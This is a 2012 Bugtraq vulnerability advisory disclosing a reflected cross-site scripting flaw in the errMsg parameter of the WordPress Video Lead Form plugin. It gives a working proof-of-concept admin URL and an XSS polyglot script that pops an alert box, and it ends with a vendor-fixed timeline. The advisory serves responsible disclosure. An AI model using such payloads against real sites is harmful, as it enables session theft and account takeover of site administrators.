[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
ideo Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ideo Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL
- From: nauty.me04@xxxxxxxxx
- Date: Thu, 29 Nov 2012 05:39:13 GMT
#############################
Exploit Title : Video Lead Form Plugin Cross-Site Scripting Vulnerabilities
which affects Wordpress URL
Author: Aditya Balapure
home: http://adityabalapure.blogspot.in/
Date: 24/11/12
version: 0.5
software link: http://wordpress.org/extend/plugins/video-lead-form/
#############################
Video Lead Form plugin description
Video Lead Form is a sales and marketing dream tool. Many people use video as a
means of engaging their visitors but then have to find awkward ways to ask
their visitors to submit a contact or lead form. Video Lead Form solves this
problem by embedding the form directly into the video. Users of Video Lead Form
can choose where in the video the form should appear, either at the beginning,
the end, or five seconds after the video starts.
When a viewer submits the form, their information is emailed to you, simple as
that. Video Lead Form can also be integrated with Salesforce for an even easier
way to generate and manage sales leads.
##########################
XSS location
The Video Lead Form Plugin in Wordpress
http://wordpress.org/extend/plugins/video-lead-form/ has a Reflective XSS
vulnerability in the browser URL which affects Wordpress 3.4.2 (Platform Used)
Original URL -
http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Modified URL -
http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Script Used-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
##########################
Vendor Notification
24/11/2012 to: - Vendor notified awaiting action
29/11/2012 - Fixed and closed